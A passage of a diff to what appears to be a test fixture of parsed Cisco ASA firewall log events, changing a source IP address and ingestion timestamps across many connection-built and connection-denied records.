"2021-09-07T12:21:32.722309300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", + "ingested": "2021-12-09T13:34:28.100604500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -18249,7 +18249,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.124.24", + "mapped_source_ip": "192.168.124.24", "connection_id": "11844", "source_interface": "outside", "mapped_destination_port": 1306 @@ -18271,8 +18271,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" 
@@ -18306,7 +18306,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18315,8 +18315,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722313100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100610200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18352,8 +18352,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18387,7 +18387,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18396,8 +18396,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722316800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100616100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18433,8 +18433,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18468,7 +18468,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -18477,8 +18477,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722320600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100622Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18514,8 +18514,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18549,7 +18549,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18558,8 +18558,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722324600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100627900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18595,8 +18595,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18630,7 +18630,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -18639,8 +18639,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722328300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100633800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18676,8 +18676,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18711,7 +18711,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18720,8 +18720,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722332200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100639700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18757,8 +18757,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18792,7 +18792,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -18801,8 +18801,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722336Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100644200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18838,8 +18838,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18873,7 +18873,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -18882,8 +18882,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.722340200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.100647800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -18919,8 +18919,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -18954,7 +18954,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, 
@@ -18963,8 +18963,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722344200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100652300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19000,8 +19000,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19035,7 +19035,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19044,8 +19044,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722348200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100657600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19081,8 +19081,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19116,7 +19116,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19125,8 +19125,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722352600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100663100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19162,8 +19162,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19197,7 +19197,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19206,8 +19206,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722357Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100669Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19243,8 +19243,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19278,7 +19278,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19287,8 +19287,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722361200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100673400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19324,8 +19324,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19359,7 +19359,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19368,8 +19368,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722365900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100677800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19405,8 +19405,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19440,7 +19440,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19449,8 +19449,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722370300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100681500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19486,8 +19486,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19521,7 +19521,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19530,8 +19530,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722375500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100686Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19567,8 +19567,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19602,7 +19602,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19611,8 +19611,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722380Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100691900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19648,8 +19648,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19683,7 +19683,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19692,8 +19692,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722384200Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100697800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19729,8 +19729,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19764,7 +19764,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19773,8 +19773,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722388400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100703800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19810,8 +19810,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19845,7 +19845,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19854,8 +19854,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722392600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100709700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19891,8 +19891,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19926,7 +19926,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19935,8 +19935,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722397600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100715500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19972,8 +19972,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20007,7 +20007,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20016,8 +20016,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722401500Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100721300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20053,8 +20053,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20088,7 +20088,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20097,8 +20097,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722405300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100727200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20134,8 +20134,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20169,7 +20169,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20178,8 +20178,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722408900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100733200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20215,8 +20215,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20250,7 +20250,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20259,8 +20259,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722412600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100739200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20296,8 +20296,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20331,7 +20331,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20340,8 +20340,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722416400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100745Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20377,8 +20377,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20412,7 +20412,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20421,8 +20421,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722420400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100750900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20458,8 +20458,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20493,7 +20493,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20502,8 +20502,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722424100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100756800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20539,8 +20539,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20574,7 +20574,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20583,8 +20583,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722428100Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100762700Z",
